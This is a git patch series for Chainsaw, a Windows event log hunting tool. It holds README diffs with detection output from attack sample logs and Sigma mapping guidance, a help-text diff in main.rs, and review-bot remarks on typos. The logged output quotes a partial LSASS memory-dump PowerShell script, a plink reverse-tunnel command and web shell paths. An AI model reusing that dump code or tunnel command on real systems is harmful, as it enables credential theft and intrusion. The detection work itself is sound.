├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-07-03 08:47:21 │ 11 │ ‣ Suspicious Desktopimgdownldr │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Local\Temp\Personalization │ C:\Windows\System32\svchost.exe │ - │ │ │ Target File │ │ \LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc3 │ │ - │ │ │ │ │ 19JaA.7z │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:33 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Roaming\WINWORD.exe │ C:\Users\Public\tools\apt\wwlib\test.exe │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:33 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Roaming\wwlib.dll │ C:\Users\Public\tools\apt\wwlib\test.exe │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-23 21:57:34 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Local\Temp\tmp1375\__tmp_r │ c:\Users\Public\test.tmp │ - │ │ │ Folder │ │ ar_sfx_access_check_2914968 │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-23 21:57:34 │ 11 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\IEUser\AppData\Local\Temp\tmp1375\d948 │ c:\Users\Public\test.tmp 
│ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼────────────────────────────────┼────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-11-26 17:38:11 │ 11 │ ‣ Execution from Suspicious │ "LAPTOP-JU4M3I0E" │ C:\Users\Public\tools\privesc\uac\system32\npmprox │ C:\Users\Public\tools\privesc\uac\byeintegrity5-ua │ - │ │ │ Folder │ │ y.dll │ c.exe │ - └─────────────────────┴────┴────────────────────────────────┴────────────────────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘ - - - [+] Detection: Windows Defender Detections - ┌─────────────────────┬──────┬───────────────┬───────────────────────────────────┬────────────────────────────────────────────────────┬───────────────────────┐ - │ system_time │ id │ computer │ threat_name │ threat_file │ user │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:40:00 │ 1116 │ "MSEDGEWIN10" │ "Trojan:PowerShell/Powersploit.M" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1056\\Get-Keystrokes.ps1" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:40:16 │ 1116 │ "MSEDGEWIN10" │ "Trojan:XML/Exeselrun.gen!A" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1086\\payloads\\test.xsl" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:41:16 │ 1116 │ "MSEDGEWIN10" │ "HackTool:JS/Jsprat" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ 
atomics\\T1100\\shells\\b.jsp->(SCRIPT0005)" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:41:17 │ 1116 │ "MSEDGEWIN10" │ "Backdoor:ASP/Ace.T" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1100\\shells\\cmd.aspx" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:41:48 │ 1116 │ "MSEDGEWIN10" │ "Trojan:Win32/Sehyioa.A!cl" │ "file:_C:\\AtomicRedTeam\\atomic-red-team-master\\ │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ atomics\\T1218\\src\\Win32\\T1218-2.dll" │ │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────────────┼────────────────────────────────────────────────────┼───────────────────────┤ - │ 2019-07-18 20:51:50 │ 1116 │ "MSEDGEWIN10" │ "HackTool:JS/Jsprat" │ "containerfile:_C:\\AtomicRedTeam\\atomic-red-team │ "MSEDGEWIN10\\IEUser" │ - │ │ │ │ │ -master\\atomics\\T1100\\shells\\b.jsp; file:_C:\\ │ │ - │ │ │ │ │ AtomicRedTeam\\atomic-red-team-master\\atomics\\T1 │ │ - │ │ │ │ │ 100\\shells\\b.jsp->(SCRIPT0005); file:_C:\\Atomic │ │ - │ │ │ │ │ RedTeam\\atomic-red-team-master\\atomics\\T1100\\s │ │ - │ │ │ │ │ hells\\b.jsp->(SCRIPT0037); file:_C:\\AtomicRedTea │ │ - │ │ │ │ │ m\\atomic-red-team-master\\atomics\\T1100\\shells\ │ │ - │ │ │ │ │ \b.jsp->(SCRIPT0045); file:_C:\\AtomicRedTeam\\ato │ │ - │ │ │ │ │ mic-red-team-master\\atomics\\T1100\\shells\\b.jsp │ │ - │ │ │ │ │ ->(SCRIPT0065); file:_C:\\AtomicRedTeam\\atomic-re │ │ - │ │ │ │ │ d-team-master\\atomics\\T1100\\shells\\b.jsp->(SCR │ │ - │ │ │ │ │ IPT0068)" │ │ - └─────────────────────┴──────┴───────────────┴───────────────────────────────────┴────────────────────────────────────────────────────┴───────────────────────┘ - - [+] Detection: Suspicious Image Load - 
┌─────────────────────┬────┬─────────────────────────────┬───────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.Image │ image_loaded │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-04-27 18:47:00 │ 7 │ ‣ Execution from Suspicious │ "IEWIN7" │ C:\Users\Public\KeeFarce.exe │ C:\Users\Public\BootstrapDLL.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-05-18 17:16:18 │ 7 │ ‣ In-memory PowerShell │ "IEWIN7" │ C:\Windows\System32\notepad.exe │ C:\Windows\assembly\NativeImages_v2.0.50727_32\Sys │ - │ │ │ │ │ │ tem.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e │ - │ │ │ │ │ │ \System.Management.Automation.ni.dll │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-05-23 17:26:08 │ 7 │ ‣ XSL Script Processing │ "IEWIN7" │ \\vboxsrv\HTools\msxsl.exe │ C:\Windows\System32\msxml3.dll │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-06-14 22:22:31 │ 7 │ ‣ WMI Modules Loaded │ "IEWIN7" │ C:\Users\IEUser\Downloads\a.exe │ C:\Windows\System32\wbem\wmiutils.dll │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-06-14 22:23:26 │ 7 │ ‣ WMI Modules Loaded │ "IEWIN7" │ 
C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\B │ C:\Windows\System32\wbem\wmiutils.dll │ - │ │ │ │ │ RE6BgE2JubB.exe │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-08-30 12:54:08 │ 7 │ ‣ WMI Modules Loaded │ "MSEDGEWIN10" │ C:\Windows\System32\cscript.exe │ C:\Windows\System32\wbem\wmiutils.dll │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-08-02 16:24:07 │ 7 │ ‣ Fax Service DLL Search │ "MSEDGEWIN10" │ C:\Windows\System32\FXSSVC.exe │ C:\Windows\System32\Ualapi.dll │ - │ │ │ Order Hijack │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-15 13:17:02 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\tendyron.exe │ C:\Users\Public\tools\apt\OnKeyToken_KEB.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:28 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe │ C:\Users\Public\tools\apt\wwlib\wwlib.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:28 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe │ C:\Users\Public\tools\apt\wwlib\wwlib.dll │ - │ │ │ Folder │ │ │ │ - 
├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:31 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe │ C:\Users\Public\tools\apt\wwlib\wwlib.dll │ - │ │ │ Folder │ │ │ │ - ├─────────────────────┼────┼─────────────────────────────┼───────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2020-10-17 11:43:31 │ 7 │ ‣ Execution from Suspicious │ "MSEDGEWIN10" │ C:\Users\Public\tools\apt\wwlib\test.exe │ C:\Users\Public\tools\apt\wwlib\wwlib.dll │ - │ │ │ Folder │ │ │ │ - └─────────────────────┴────┴─────────────────────────────┴───────────────┴────────────────────────────────────────────────────┴────────────────────────────────────────────────────┘ - - [+] Detection: Suspicious Powershell ScriptBlock - ┌─────────────────────┬──────┬──────────────────────────┬───────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.ScriptBlockText │ - ├─────────────────────┼──────┼──────────────────────────┼───────────────┼────────────────────────────────────────────────────┤ - │ 2020-06-30 14:24:08 │ 4104 │ ‣ PowerShell Get-Process │ "MSEDGEWIN10" │ function Memory($path){ $Process = Get-Process ls │ - │ │ │ LSASS in ScriptBlock │ │ ass$DumpFilePath = $path$WER = [PSObject].Assembly │ - │ │ │ │ │ .GetType('System.Management.Automation.WindowsErro │ - │ │ │ │ │ rReporting')$WERNativeMethods = $WER.GetNestedType │ - │ │ │ │ │ ('NativeMethods', 'NonPublic')$Flags = [Reflection │ - │ │ │ │ │ .BindingFlags] 'NonPublic, Static'$MiniDumpWriteDu │ - │ │ │ │ │ mp = $WERNativeMethods.GetMethod('MiniDumpWriteDum │ - │ │ │ │ │ p', $Flags)$MiniDumpWithFullMemory = [UInt32] 2 #$ │ - │ │ │ │ │ ProcessId = $Process.Id$ProcessName = $Process.Nam │ - │ │ │ │ 
│ e$ProcessHandle = $Process.Handle$ProcessFileName │ - │ │ │ │ │ = "$($ProcessName).dmp"$ProcessDumpPath = Join-Pat │ - │ │ │ │ │ h $DumpFilePath $ProcessFileName$FileStream = New- │ - │ │ │ │ │ Object IO.FileStream($ProcessDumpPath, [IO.FileMod │ - │ │ │ │ │ e]::Create) $Result = $MiniDumpWriteDump.Invoke($n │ - │ │ │ │ │ ull, @($ProcessHandle,$ProcessId,$FileStream.SafeF │ - │ │ │ │ │ ileHandle,$MiniDumpWithFullMemory,[IntPtr]::Zero,[ │ - │ │ │ │ │ IntPtr]::Zero,[IntPtr]::Zero)) $FileStream.Close() │ - │ │ │ │ │ if (-not $Result){$Exception = New-Object Componen │ - │ │ │ │ │ tModel.Win32Exception$ExceptionMessage = "$($Excep │ - │ │ │ │ │ tion.Message) ($($ProcessName):... │ - │ │ │ │ │ │ - │ │ │ │ │ (use --full to show all content) │ - └─────────────────────┴──────┴──────────────────────────┴───────────────┴────────────────────────────────────────────────────┘ - - [+] Detection: System log was cleared - ┌─────────────────────┬─────┬───────────────────────────────────┬──────────────┐ - │ system_time │ id │ computer │ subject_user │ - ├─────────────────────┼─────┼───────────────────────────────────┼──────────────┤ - │ 2019-03-19 23:34:25 │ 104 │ "PC01.example.corp" │ "user01" │ - ├─────────────────────┼─────┼───────────────────────────────────┼──────────────┤ - │ 2020-09-15 19:28:31 │ 104 │ "01566s-win16-ir.threebeesco.com" │ "a-jbrown" │ - └─────────────────────┴─────┴───────────────────────────────────┴──────────────┘ - - [+] Detection: New User Created - ┌─────────────────────┬──────┬───────────────────────────────────┬─────────────────┬──────────────────────────────────────────────────┐ - │ system_time │ id │ computer │ target_username │ user_sid │ - ├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┼──────────────────────────────────────────────────┤ - │ 2020-09-16 09:31:19 │ 4720 │ "01566s-win16-ir.threebeesco.com" │ "$" │ "S-1-5-21-308926384-506822093-3341789130-107103" │ - 
├─────────────────────┼──────┼───────────────────────────────────┼─────────────────┼──────────────────────────────────────────────────┤ - │ 2020-09-16 09:32:13 │ 4720 │ "01566s-win16-ir.threebeesco.com" │ "$" │ "S-1-5-21-308926384-506822093-3341789130-107104" │ - └─────────────────────┴──────┴───────────────────────────────────┴─────────────────┴──────────────────────────────────────────────────┘ - - [+] Detection: User added to interesting group - ┌─────────────────────┬──────┬───────────────┬───────────────────────────┬─────────────────────────────────────────────────┬──────────────────┐ - │ system_time │ id │ computer │ change_type │ user_sid │ target_group │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤ - │ 2019-09-22 11:22:05 │ 4732 │ "MSEDGEWIN10" │ User added to local group │ "S-1-5-21-3461203602-4096304019-2269080069-501" │ "Administrators" │ - ├─────────────────────┼──────┼───────────────┼───────────────────────────┼─────────────────────────────────────────────────┼──────────────────┤ - │ 2019-09-22 11:23:19 │ 4732 │ "MSEDGEWIN10" │ User added to local group │ "S-1-5-20" │ "Administrators" │ - └─────────────────────┴──────┴───────────────┴───────────────────────────┴─────────────────────────────────────────────────┴──────────────────┘ - - -## How to add support for more rules -The following sections will guide you through how to work with Chainsaw's mapping files in order to add support for additional Sigma rules that may be unsupported by Chainsaw's default configuration. - -### What is the mapping file? 
-In order to support Sigma rule detection logic, Chainsaw requires a 'mapping file' to specify: - - - Which event IDs to process - - Which fields in the event logs are important - - Which fields to include when displaying the output of Chainsaw - -The included sigma mapping in the "mapping_files" directory already supports most of the key Event IDs, but if you want to add support for additional event IDs or use additional event log fields in a Sigma rule then you'll need to augment the mapping file. - -Let's take a look at the default mapping file that ships with Chainsaw. The mapping file is written in Yaml and contains three top level keys: - - - kind - - exclusions - - mappings - -#### Kind - - # Supported values are Stalker and Sigma - kind: sigma - -The 'kind' key tells Chainsaw whether the specified rules are in a Sigma rule format, or in a Stalker rule format. For the vast majority of Chainsaw users you're going to be using the Sigma rule format. Stalker rules are a custom rule format that are used at F-Secure and are not publicly available. - -*Tl;Dr - Unless you know what you're doing, leave this key set to 'sigma'* - -#### Exclusions - - exclusions: - - "Wuauclt Network Connection" - - "Exports Registry Key To an Alternate Data Stream" - - "NetNTLM Downgrade Attack" - - "Non Interactive PowerShell" - -The exclusions key tells Chainsaw to ignore certain rules by their name. For example, in testing we found that the 'Non Interactive PowerShell' Sigma rule is very noisy and resulted in significant bloat to the output of Chainsaw. The default mapping files specifies this rule name in the 'exclusions' key to skip this rule if it's provided. 
- -Tl;Dr - *You can use the exclusions sections of the mapping file to skip certain rules by name* - -#### Mappings - - mappings: - 1: <----- Event ID - title: "Suspicious Process Creation" - provider: "Microsoft-Windows-Sysmon" <----- Event Provider - search_fields: <---- Map Sigma fields to Event Log Fields - Image: "Event.EventData.Image" - CommandLine: "Event.EventData.CommandLine" - ParentImage: "Event.EventData.ParentImage" - ParentCommandLine: "Event.EventData.ParentCommandLine" - OriginalFileName: "Event.EventData.OriginalFileName" - table_headers: <------- Which fields to output in table/csv/json - context_field: "Event.EventData.Image" - command_line: "Event.EventData.CommandLine" - -The mappings key is the core part of the mappings file. This section tells Chainsaw: - - - What event IDs to process (e.g. Event ID 4104) - - What event ID provider to process (e.g. Microsoft-Windows-Sysmon) - - What fields in those event logs to care process (e.g. Event.EventData.OriginalFileName) - - What fields to display in the table output when a rule matches - -Let's take a look at each of the sub-keys in turn: - -##### Event ID - -If we look at the example mapping file shown a few lines above, this snippet is telling Chainsaw to process all of the Windows Event Logs that have the ID of '1'. **When Chainsaw parses event logs in 'hunt' mode, if the event ID is not listed in the mapping file, it will be ignored.** This approach helps to drastically speed up the execution time of Chainsaw, because it means that we only perform rule matching on the event logs that we definitely care about. - -##### Provider - -Only specifying the event ID is not granular enough; random Windows applications can specify their own event ID so if we want to target just the process creation event logs for sysmon (which is what we're looking for with Event ID 1) then we need to be more specific about which event logs we're interested in. 
This is why we also need to specify the provider as well: - - provider: "Microsoft-Windows-Sysmon" - -So in this case, Chainsaw will only process Windows event log entries if the event ID is "1" AND the provider is "Microsoft-Windows-Sysmon". - -##### Title - -The *title* key specifies what text Chainsaw should put at the top of each section of output relating to detections for these event IDs. So in this example, all detections relating to EventID: 1 from the Sysmon provider will be titled "Suspicious Process Creation": - - [+] Detection: Suspicious Process Creation - ┌─────────────────────┬────┬──────────────────────────────────────────┬────────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.Image │ command_line │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-02-16 10:02:21 │ 1 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ C:\Users\IEUser\Desktop\plink.exe │ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 │ - │ │ │ Tools Execution │ │ │ .0.0.2:3389 -l test -pw test │ - -##### search_fields - -The search fields sub-key tells chainsaw which fields in the event log to process, and how they should be mapped to the Sigma rule format. 
Let's look at an example, let's say we want to run the following Sigma rule over all Process Creation events from Sysmon: - - title: Suspicious AdFind Execution - id: 75df3b17-8bcc-4565-b89b-c9898acef911 - status: experimental - description: Detects the execution of a AdFind for Active Directory enumeration - references: - - https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx - - https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/master/fin6/Emulation_Plan/Phase1.md - - https://thedfirreport.com/2020/05/08/adfind-recon/ - author: FPT.EagleEye Team, omkar72, oscd.community - date: 2020/09/26 - modified: 2021/05/12 - tags: - - attack.discovery - - attack.t1018 - - attack.t1087.002 - - attack.t1482 - - attack.t1069.002 - logsource: - product: windows - category: process_creation - detection: - selection: - CommandLine|contains: - - 'objectcategory' - - 'trustdmp' - - 'dcmodes' - - 'dclist' - - 'computers_pwdnotreqd' - Image|endswith: '\adfind.exe' - condition: selection - falsepositives: - - Administrative activity - level: medium - -In the Sigma rule above, we can see that the detection criteria relies on two key fields: - - - CommandLine - - Image - -Without a mapping file, Chainsaw wouldn't know which fields in the event log (they're not always named the same) to apply this logic to. So we need to tell Chainsaw which event log fields are the CommandLine and the Image. 
Fortunately Chainsaw gives us a way to find out this information, let's look at an example event ID 1 log: - - > % ./chainsaw search -e 1 ~/chainsaw/evtx_attack_samples/ -q | head -n 50 - --- - Event: - EventData: - CommandLine: "plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test" <------ Command Line - Company: Simon Tatham - CurrentDirectory: "C:\\Users\\IEUser\\Desktop\\" - Description: "Command-line SSH, Telnet, and Rlogin client" - FileVersion: Release 0.70 - Hashes: SHA1=7806AD24F669CD8BB9EBE16F87E90173047F8EE4 - Image: "C:\\Users\\IEUser\\Desktop\\plink.exe" <----- Process Name - IntegrityLevel: High - LogonGuid: 365ABB72-D6AB-5C67-0000-002056660200 - LogonId: "0x26656" - ParentCommandLine: "\"C:\\Windows\\system32\\cmd.exe\" " - ParentImage: "C:\\Windows\\System32\\cmd.exe" - ParentProcessGuid: 365ABB72-D92A-5C67-0000-0010CB580900 - ParentProcessId: 3904 - ProcessGuid: 365ABB72-DFAD-5C67-0000-0010E0811500 - ProcessId: 2312 - Product: PuTTY suite - RuleName: "" - TerminalSessionId: 1 - User: "PC01\\IEUser" - UtcTime: "2019-02-16 10:02:21.934" - System: - Channel: Microsoft-Windows-Sysmon/Operational - Computer: PC01.example.corp - Correlation: ~ - EventID: 1 - EventRecordID: 1940899 - Execution_attributes: - ProcessID: 1728 - ThreadID: 412 - Keywords: "0x8000000000000000" - Level: 4 - Opcode: 0 - Provider_attributes: - Guid: 5770385F-C22A-43E0-BF4C-06F5698FFBD9 - Name: Microsoft-Windows-Sysmon <----- Provider - Security_attributes: - UserID: S-1-5-18 - Task: 1 - TimeCreated_attributes: - SystemTime: "2019-02-16T10:02:21.934438Z" - Version: 5 - Event_attributes: - xmlns: "http://schemas.microsoft.com/win/2004/08/events/event" - -Looking at the output of Chainsaw above, we can see that the fields that we need to map are: - - - CommandLine == Event.EventData.CommandLine - - Image == Event.EventData.Image - -By adding this information to the mapping file, Chainsaw can now run this sigma rule against the process creation event logs. 
- -##### table_headers - -The table_headers key in the mapping file tells Chainsaw which fields to output when displaying detections. Displaying all the fields in the event log would be difficult to format and would be difficult for analysts to view, so instead we specify the key fields that we care about. - -This section **must** contain at least one sub-key named: *context_field*. The field specified in this key will always be placed in the left most position on the table output. All other specified fields will be placed after that. Let's take a look at an example: - - table_headers: <------- Which fields to output in table/csv - context_field: "Event.EventData.Image" - command_line: "Event.EventData.CommandLine" - -This means that for every detection for Event ID: 1 (sysmon process creation) events, the **Event.EventData.Image** and **Event.EventData.CommandLine** fields from the matching event log will be shown in the output of Chainsaw: - - [+] Detection: Suspicious Process Creation - ┌─────────────────────┬────┬──────────────────────────────────────────┬────────────────────────────────┬────────────────────────────────────────────────────┬────────────────────────────────────────────────────┐ - │ system_time │ id │ detection_rules │ computer_name │ Event.EventData.Image │ command_line │ - ├─────────────────────┼────┼──────────────────────────────────────────┼────────────────────────────────┼────────────────────────────────────────────────────┼────────────────────────────────────────────────────┤ - │ 2019-02-16 10:02:21 │ 1 │ ‣ Exfiltration and Tunneling │ "PC01.example.corp" │ C:\Users\IEUser\Desktop\plink.exe │ plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127 │ - │ │ │ Tools Execution │ │ │ .0.0.2:3389 -l test -pw test │ - -(Note: the system_time, event ID, detection_rule and computer name will always be shown in addition to the fields specified in the table_headers section) + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules --mapping 
mappings/sigma-event-logs.yml --from "2019-03-17T19:09:39" --to "2019-03-17T19:09:50" --json ### Acknowledgements - - [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) by [SBousseaden](https://twitter.com/SBousseaden) + - [EVTX-ATTACK-SAMPLES](https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES) by [@SBousseaden](https://twitter.com/SBousseaden) - [Sigma](https://github.com/SigmaHQ/sigma) detection rules - [EVTX parser](https://github.com/omerbenamram/evtx) library by [@OBenamram](https://twitter.com/obenamram?lang=en) - [TAU Engine](https://github.com/countercept/tau-engine) Library by [@AlexKornitzer](https://twitter.com/AlexKornitzer?lang=en) diff --git a/chainsaw.png b/images/chainsaw.png similarity index 100% rename from chainsaw.png rename to images/chainsaw.png diff --git a/src/main.rs b/src/main.rs index 0e4344f9..6990d7de 100644 --- a/src/main.rs +++ b/src/main.rs @@ -20,7 +20,21 @@ use chainsaw::{ #[derive(StructOpt)] #[structopt( name = "chainsaw", - about = "Rapidly Search and Hunt through windows event logs" + about = "Rapidly Search and Hunt through windows event logs", + after_help = r"Examples: + + Hunt with Sigma and Chainsaw Rules: + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml -r rules/ + + Hunt with Sigma rules and output in JSON: + ./chainsaw hunt evtx_attack_samples/ -s sigma_rules/ --mapping mappings/sigma-event-logs.yml --json + + Search for the case-insensitive word 'mimikatz': + ./chainsaw search mimikatz -i evtx_attack_samples/ + + Search for Powershell Script Block Events (EventID 4014): + ./chainsaw search -t 'Event.System.EventID: =4104' evtx_attack_samples/ + " )] struct Opts { /// Hide Chainsaw's banner. 
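Review bot: The last example in the new `after_help` text labels PowerShell script block events as `EventID 4014`, while the command on the next line filters on `Event.System.EventID: =4104`; the two disagree, and the removed README output earlier in this series shows the script block detections under id 4104, so the label should read `Search for Powershell Script Block Events (EventID 4104):`. Because this string is printed to everyone who asks for `--help`, a wrong event id in it sends users to the wrong logs. The `Opts` struct that this attribute decorates continues past the end of the hunk.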
@@ -32,18 +46,18 @@ struct Opts { #[derive(StructOpt)] enum Command { - /// Hunt through event logs using detection rules and builtin logic. + /// Hunt through event logs using detection rules for threat detection Hunt { - /// The path to a collection of rules. + /// The path to a collection of rules to use for hunting. rules: PathBuf, - /// The paths containing event logs to hunt through. + /// The paths containing event logs to load and hunt through. path: Vec, - /// A mapping file to hunt with. + /// A mapping file to tell Chainsaw how to use third-party rules. #[structopt(short = "m", long = "mapping", number_of_values = 1)] mapping: Option>, - /// Additional rules to hunt with. + /// A path containing additional rules to hunt with. #[structopt(short = "r", long = "rule", number_of_values = 1)] rule: Option>, @@ -77,7 +91,7 @@ enum Command { /// Output the timestamp using the local machine's timestamp. #[structopt(long = "local", group = "tz")] local: bool, - /// Apply addional metadata for the tablar output. + /// Display additional metadata in the tablar output. #[structopt(long = "metadata", conflicts_with = "json")] metadata: bool, /// The file/directory to output to. @@ -89,7 +103,7 @@ enum Command { /// Supress informational output. #[structopt(short = "q")] quiet: bool, - /// Sigma rules to hunt with. + /// A path containing Sigma rules to hunt with. #[structopt(short = "s", long = "sigma", number_of_values = 1, requires("mapping"))] sigma: Option>, /// Continue to hunt when an error is encountered. @@ -124,10 +138,10 @@ enum Command { #[structopt(required_unless_one=&["regexp", "tau"])] pattern: Option, - /// The paths containing event logs to hunt through. + /// The paths containing event logs to load and hunt through. path: Vec, - /// A pattern to search for. + /// A regular expressions (RegEx) pattern to search for. #[structopt(short = "e", long = "regexp", number_of_values = 1)] regexp: Option>, 
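Review bot: The rewritten doc comment in the `@@ -77,7 +91,7 @@` hunk keeps the misspelling from the line it replaces — `/// Display additional metadata in the tablar output.` should be `/// Display additional metadata in the tabular output.` — and since StructOpt renders these comments as `--help` text the typo is user-visible. The same applies to `/// A regular expressions (RegEx) pattern to search for.` in the `@@ -124,10 +138,10 @@` hunk, which should read `/// A regular expression (RegEx) pattern to search for.`. In the first hunk the new variant comment `/// Hunt through event logs using detection rules for threat detection` drops the trailing full stop that every sibling comment carries, so the generated help text will be inconsistent. The `Command` enum these hunks touch starts and ends outside the visible hunks.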
From a6db8feccc9756a2768d0ca7a7a3c7101dfbd3a7 Mon Sep 17 00:00:00 2001 From: FranticTyping Date: Wed, 6 Jul 2022 23:12:34 +0100 Subject: [PATCH 59/77] docs: updating quick start guide --- README.md | 22 +++++++++++++++++----- 1 file changed, 17 insertions(+), 5 deletions(-) diff --git a/README.md b/README.md index 342a5992..eadefddc 100644 --- a/README.md +++ b/README.md 
@@ -111,7 +111,7 @@ Windows event logs provide a rich source of forensic information for threat hunt At WithSecure Countercept, we ingest a wide range of telemetry sources from endpoints via our EDR agent to provide our managed detection and response service. However, there are circumstances where we need to quickly analyze event log data that hasn’t been captured by our EDR, a common example being incident response investigations on an estate where our EDR wasn’t installed at the time of the compromise. Chainsaw was created to provide our threat hunters and incident response consultants with a tool to perform rapid triage of Windows event logs in these circumstances. -At the time of writing, there are very few open-source, standalone tools that provide a simple and fast method of triaging Windows event logs, identifying interesting elements within the logs and applying a detection logic rule format (such as Sigma) to detect signs of malicious activity. In our testing, the tools that did exist struggled to efficiently apply detection logic to large volumes of event logs making them unsuitable for scenarios where quick triage is required. +At the time of writing, there are very few open-source, standalone tools that provide a simple and fast method of triaging Windows event logs, identifying interesting elements within the logs and applying a detection logic rule format (such as Sigma) to detect signs of malicious activity. In our testing, the tools that did exist struggled to efficiently apply detection logic to large volumes of event logs making them unsuitable for scenarios where quick triage is required. ## Hunting Logic 
